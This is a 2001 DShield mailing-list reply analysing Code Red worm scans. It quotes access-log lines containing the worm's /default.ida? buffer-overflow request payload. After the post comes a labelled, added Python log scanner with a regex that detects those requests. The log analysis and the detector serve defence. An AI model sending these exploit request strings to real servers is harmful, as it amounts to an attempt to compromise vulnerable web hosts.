[Dshield] Code Red Host Scans (and more)

John Groseclose iain at caradoc.org
Sat Aug 4 15:31:52 GMT 2001


At 6:41 PM -0400 8/2/01, Tim Dwayne Southard wrote:
My IDS (Cisco Secure) is not detecting the host scans from infected 
machines.  I can see the default.ida?NNN stuff but I think that is 
the second stage (infection).  I need to see the port 80 scans 
regardless of whether they are scanning MS boxes.  Any assistance 
will be repaid with good Karma.

The "scan" *is* the "exploit." Code Red doesn't check first to see if 
you're running IIS before attempting to infect. There are no primary 
or secondary stages to the Code Red worm - it either infects your 
machine, or it doesn't.

The weirder part is this... A "normal" Code Red attempt looks like this:

cx215003-b.wwck1.ri.home.com - - [01/Aug/2001:04:31:50 -0700] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 400 324 "-" "-"

Since 12:44:09 GMT, I've been receiving *these* in my logs:

h-64-105-129-178.lsancaba.covad.net - - [04/Aug/2001:05:44:09 -0700] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 277 "-" "-"
www.sacramentochats.com - - [04/Aug/2001:06:08:15 -0700] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 277 "-" "-"

It *looks* like the second worm is trying to reboot the machine via 
an exploit for cmd.exe, but since I don't have any Windows machines 
around to work with, I can't really do any experimentation with it. 
Perhaps someone wrote a "counter-worm."
-- 
John Groseclose
iain at caradoc.org
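The reply's practical point is that the request line itself is the indicator: the worm sends the same `/default.ida?` request to every host, so a detector should key on the request, not on whether the server answered 400, 404 or anything else. The following is an added example (not part of the original post or of any DShield tooling) that parses Apache-style log lines like the ones quoted above and classifies each hit by its fill character: N for the form John calls "normal", X for the form he began seeing on 4 August (the X-fill request was later designated Code Red II). The sample log text is constructed here, with the fill shortened to ten characters since the detector does not depend on its length, and the function names `classify_request`, `scan_log` and `summarize` are this example's own.

```python
import re
from collections import Counter
from typing import Optional

# Constructed sample, abbreviated from the lines quoted in the post: the real
# fill is hundreds of characters long, but the detector only needs its first
# character. The third line is ordinary traffic that must not match.
SAMPLE_LOG = """\
cx215003-b.wwck1.ri.home.com - - [01/Aug/2001:04:31:50 -0700] "GET /default.ida?NNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 324 "-" "-"
h-64-105-129-178.lsancaba.covad.net - - [04/Aug/2001:05:44:09 -0700] "GET /default.ida?XXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 277 "-" "-"
10.0.0.5 - - [04/Aug/2001:06:00:00 -0700] "GET /index.html HTTP/1.0" 200 1234 "-" "Mozilla/4.0"
"""

# Apache common/combined log format: host ident user [timestamp] "request" status size ...
# The request is split with \s+ because the quoted lines have two spaces before HTTP/1.0.
CLF_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+)\s+(?P<path>\S+)\s+(?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# A Code Red request: /default.ida? followed by a run of one fill character
# (N in the original, X in the variant reported on 4 Aug 2001), then a run of
# %u-encoded words, terminated by "=a". The final word is only two hex digits
# (%u00), hence {2,4}.
CODE_RED_RE = re.compile(
    r'^/default\.ida\?(?P<fill>N+|X+)(?P<payload>(?:%u[0-9a-fA-F]{2,4})+)=a$',
    re.IGNORECASE,
)


def classify_request(path: str) -> Optional[dict]:
    """Describe a Code Red request path, or return None for anything else."""
    m = CODE_RED_RE.match(path)
    if not m:
        return None
    fill = m.group("fill").upper()
    return {
        "fill": fill[0],
        "fill_len": len(fill),
        "variant": "original (N-fill)" if fill[0] == "N" else "X-fill variant",
        "payload": m.group("payload").lower(),
    }


def scan_log(text: str) -> list:
    """Return one record per Code Red request found in Apache-style log text.

    Every matching request is reported regardless of HTTP status: the request
    is the infection attempt, and a 400/404 only says this server is not IIS.
    """
    hits = []
    for line in text.splitlines():
        m = CLF_RE.match(line)
        if not m:
            continue  # not a parseable access-log line
        info = classify_request(m.group("path"))
        if info is None:
            continue  # ordinary request
        hits.append({
            "host": m.group("host"),
            "ts": m.group("ts"),
            "status": int(m.group("status")),
            **info,
        })
    return hits


def summarize(hits) -> Counter:
    """Count hits by fill character, so a shift from N to X stands out."""
    return Counter(h["fill"] for h in hits)


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for h in found:
        print(f'{h["ts"]} {h["host"]} status={h["status"]} {h["variant"]}')
    print("by fill character:", dict(summarize(found)))
```

Because both quoted requests carry the same `%u`-encoded payload and differ only in the fill character, a signature that matches on `/default.ida?` plus the `%u` run catches both, and the fill letter is what distinguishes the two waves in a summary.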



